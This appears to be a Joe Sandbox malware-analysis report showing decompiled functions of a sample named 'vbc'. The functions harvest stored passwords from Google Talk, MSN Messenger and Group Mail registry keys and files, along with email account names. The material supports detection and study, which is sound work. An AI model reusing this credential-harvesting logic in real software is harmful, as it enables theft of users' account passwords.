                                                                                                                                                    			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}






















                                                                                                                                                    0x004037b1
                                                                                                                                                    0x004037b1
                                                                                                                                                    0x004037cc
                                                                                                                                                    0x004037d2
                                                                                                                                                    0x004037e0
                                                                                                                                                    0x004037e6
                                                                                                                                                    0x004037fc
                                                                                                                                                    0x00403803
                                                                                                                                                    0x004038cc
                                                                                                                                                    0x004038cc
                                                                                                                                                    0x00403810
                                                                                                                                                    0x0040381b
                                                                                                                                                    0x0040381e
                                                                                                                                                    0x00403825
                                                                                                                                                    0x00403831
                                                                                                                                                    0x00403837
                                                                                                                                                    0x00403841
                                                                                                                                                    0x0040384b
                                                                                                                                                    0x0040385d
                                                                                                                                                    0x00403868
                                                                                                                                                    0x00403869
                                                                                                                                                    0x00403889
                                                                                                                                                    0x0040389e
                                                                                                                                                    0x004038a3
                                                                                                                                                    0x0040386b
                                                                                                                                                    0x00403872
                                                                                                                                                    0x00403879
                                                                                                                                                    0x00403879
                                                                                                                                                    0x004038b4
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004037D2
                                                                                                                                                    • memset.MSVCRT ref: 004037E6
                                                                                                                                                      • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                                                                                                      • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                                                                    • strchr.MSVCRT ref: 00403855
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                                                                                                    • strlen.MSVCRT ref: 0040387E
                                                                                                                                                    • sprintf.MSVCRT ref: 0040389E
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                    • API String ID: 1649821605-3288273942
                                                                                                                                                    • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                                                                                    • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                                                                                                    • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                                                                                    • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004034CB Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 317 4034cb-40352b memset * 2 call 40ebc1 320 403567-403569 317->320 321 40352d-403566 strcpy call 405f1f strcat call 4033d7 317->321 321->320
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                                                                                                                    0x004034cb
                                                                                                                                                    0x004034e4
                                                                                                                                                    0x004034eb
                                                                                                                                                    0x004034fa
                                                                                                                                                    0x00403501
                                                                                                                                                    0x00403521
                                                                                                                                                    0x0040352b
                                                                                                                                                    0x0040353c
                                                                                                                                                    0x00403541
                                                                                                                                                    0x00403547
                                                                                                                                                    0x00403554
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403566
                                                                                                                                                    0x00403569

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004034EB
                                                                                                                                                    • memset.MSVCRT ref: 00403501
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                                                                                                      • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                                                                                                      • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                                                                                                    • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetstrcat$Closestrcpystrlen
                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                    • API String ID: 1387626053-966475738
                                                                                                                                                    • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                                                                                    • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                                                                                                    • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                                                                                    • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040754D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                                                                                                                    0x0040754d
                                                                                                                                                    0x00407558
                                                                                                                                                    0x00407562
                                                                                                                                                    0x00407576
                                                                                                                                                    0x0040757b
                                                                                                                                                    0x00407580
                                                                                                                                                    0x00407593
                                                                                                                                                    0x00407597
                                                                                                                                                    0x0040759b
                                                                                                                                                    0x004075a0
                                                                                                                                                    0x004075ad
                                                                                                                                                    0x00407642
                                                                                                                                                    0x00407642
                                                                                                                                                    0x00407647
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004075cb
                                                                                                                                                    0x004075d0
                                                                                                                                                    0x004075d5
                                                                                                                                                    0x004075e5
                                                                                                                                                    0x004075ec
                                                                                                                                                    0x0040760a
                                                                                                                                                    0x0040760f
                                                                                                                                                    0x00407621
                                                                                                                                                    0x0040762a
                                                                                                                                                    0x0040762a
                                                                                                                                                    0x0040762c
                                                                                                                                                    0x0040763d
                                                                                                                                                    0x0040763d
                                                                                                                                                    0x00407651
                                                                                                                                                    0x00407651
                                                                                                                                                    0x00407658

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                                                                                                      • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                                                                                                      • Part of subcall function 0040724C: GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                                                                      • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                                                                      • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                                                                      • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                                                                      • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                                                                                                      • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                                                                                                      • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 0040759B
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • memset.MSVCRT ref: 004075EC
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                    • API String ID: 2959138223-1079885057
                                                                                                                                                    • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                                                                                    • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                                                                                                    • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                                                                                    • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A5AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 349 40a5ac-40a5be 350 40a5c0-40a5d6 call 406deb _mbsicmp 349->350 351 40a60b-40a61f call 405e2c 349->351 356 40a5d8-40a5f1 call 406deb 350->356 357 40a5ff-40a609 350->357 373 40a621 call 4047a0 351->373 374 40a621 call 4047f1 351->374 375 40a621 call 40e894 351->375 376 40a621 call 403c3d 351->376 377 40a621 call 40eb3f 351->377 362 40a5f3-40a5f6 356->362 363 40a5f8 356->363 357->350 357->351 358 40a624-40a637 call 406dfb 366 40a639-40a645 358->366 367 40a67e-40a68d SetCursor 358->367 365 40a5f9-40a5fa call 40a119 362->365 363->365 365->357 369 40a647-40a652 366->369 370 40a65c-40a67b qsort 366->370 369->370 370->367 373->358 374->358 375->358 376->358 377->358
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}











                                                                                                                                                    0x0040a5af
                                                                                                                                                    0x0040a5b1
                                                                                                                                                    0x0040a5b9
                                                                                                                                                    0x0040a5be
                                                                                                                                                    0x0040a5c0
                                                                                                                                                    0x0040a5c2
                                                                                                                                                    0x0040a5c7
                                                                                                                                                    0x0040a5c8
                                                                                                                                                    0x0040a5cd
                                                                                                                                                    0x0040a5d6
                                                                                                                                                    0x0040a5de
                                                                                                                                                    0x0040a5e6
                                                                                                                                                    0x0040a5e8
                                                                                                                                                    0x0040a5eb
                                                                                                                                                    0x0040a5f1
                                                                                                                                                    0x0040a5f8
                                                                                                                                                    0x0040a5f3
                                                                                                                                                    0x0040a5f3
                                                                                                                                                    0x0040a5f5
                                                                                                                                                    0x0040a5f5
                                                                                                                                                    0x0040a5f9
                                                                                                                                                    0x0040a5fa
                                                                                                                                                    0x0040a5fa
                                                                                                                                                    0x0040a5ff
                                                                                                                                                    0x0040a605
                                                                                                                                                    0x0040a606
                                                                                                                                                    0x0040a5c0
                                                                                                                                                    0x0040a60b
                                                                                                                                                    0x0040a616
                                                                                                                                                    0x0040a621
                                                                                                                                                    0x0040a637
                                                                                                                                                    0x0040a63f
                                                                                                                                                    0x0040a645
                                                                                                                                                    0x0040a64d
                                                                                                                                                    0x0040a652
                                                                                                                                                    0x0040a652
                                                                                                                                                    0x0040a668
                                                                                                                                                    0x0040a676
                                                                                                                                                    0x0040a67b
                                                                                                                                                    0x0040a68d

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                    • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                                                                                    • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                                                                                                    • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                                                                                    • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EE59 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 391 40ee59-40ee70 call 40edac 394 40ee72-40ee7b call 406278 391->394 395 40ee9b-40eeb9 memset 391->395 404 40ee8c-40ee8f 394->404 405 40ee7d-40ee80 394->405 396 40eec5-40eed3 395->396 397 40eebb-40eebe 395->397 400 40eee3-40eeed call 40eb3f 396->400 397->396 399 40eec0-40eec3 397->399 399->396 402 40eed5-40eede 399->402 409 40ef1d-40ef30 strcpy 400->409 410 40eeef-40ef17 call 40eddb call 40eb80 RegCloseKey 400->410 402->400 408 40ee96 404->408 405->395 407 40ee82-40ee85 405->407 407->395 411 40ee87-40ee8a 407->411 412 40ef33-40ef35 408->412 409->412 410->409 411->395 411->404
                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                    			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                                                                                                                    0x0040ee59
                                                                                                                                                    0x0040ee59
                                                                                                                                                    0x0040ee63
                                                                                                                                                    0x0040ee70
                                                                                                                                                    0x0040eea8
                                                                                                                                                    0x0040eeae
                                                                                                                                                    0x0040eeb9
                                                                                                                                                    0x0040eec8
                                                                                                                                                    0x0040eec9
                                                                                                                                                    0x0040eece
                                                                                                                                                    0x0040eed5
                                                                                                                                                    0x0040eed8
                                                                                                                                                    0x0040eed9
                                                                                                                                                    0x0040eede
                                                                                                                                                    0x0040eede
                                                                                                                                                    0x0040eeed
                                                                                                                                                    0x0040eef4
                                                                                                                                                    0x0040ef0c
                                                                                                                                                    0x0040ef17
                                                                                                                                                    0x0040ef17
                                                                                                                                                    0x0040ef25
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ee8c
                                                                                                                                                    0x0040ee90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ee90

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                                                                                      • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                                                                                    • memset.MSVCRT ref: 0040EEAE
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                                                                    • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                                                                      • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                    • API String ID: 181880968-2036018995
                                                                                                                                                    • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                                                                                    • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                                                                                                    • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                                                                                    • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040396C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 417 40396c-4039a9 call 4046d7 420 4039ae-4039b2 417->420 421 4039b4-4039c9 RegOpenKeyExA 420->421 422 4039df-4039e4 420->422 423 4039db-4039dd 421->423 424 4039cb 421->424 425 403a03-403a07 call 40d5db 422->425 426 4039e6-4039fb RegOpenKeyExA 422->426 428 403a0c-403a10 423->428 427 4039cf-4039d9 call 40d4a6 424->427 425->428 426->423 429 4039fd-403a01 426->429 427->428 431 403a12-403a1a call 4038cf 428->431 432 403a1f-403a28 428->432 429->427 431->432 432->420 435 403a2a-403a3c call 4047f1 432->435
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}


















                                                                                                                                                    0x0040396c
                                                                                                                                                    0x00403982
                                                                                                                                                    0x0040398d
                                                                                                                                                    0x00403998
                                                                                                                                                    0x0040399a
                                                                                                                                                    0x0040399e
                                                                                                                                                    0x004039a5
                                                                                                                                                    0x004039ae
                                                                                                                                                    0x004039b2
                                                                                                                                                    0x004039df
                                                                                                                                                    0x004039e4
                                                                                                                                                    0x00403a07
                                                                                                                                                    0x004039e6
                                                                                                                                                    0x004039f7
                                                                                                                                                    0x004039f9
                                                                                                                                                    0x004039fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039fd
                                                                                                                                                    0x004039fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039fd
                                                                                                                                                    0x004039fb
                                                                                                                                                    0x004039b4
                                                                                                                                                    0x004039c5
                                                                                                                                                    0x004039c9
                                                                                                                                                    0x004039db
                                                                                                                                                    0x004039db
                                                                                                                                                    0x004039cb
                                                                                                                                                    0x004039cb
                                                                                                                                                    0x004039cf
                                                                                                                                                    0x004039d4
                                                                                                                                                    0x004039d4
                                                                                                                                                    0x004039c9
                                                                                                                                                    0x00403a0c
                                                                                                                                                    0x00403a10
                                                                                                                                                    0x00403a1a
                                                                                                                                                    0x00403a1a
                                                                                                                                                    0x00403a1f
                                                                                                                                                    0x00403a23
                                                                                                                                                    0x00403a3c

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                                                                                      • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                                                                      • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                                                                                      • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                                                                      • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                                                                                    • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                                                                                    Memory Dump Source
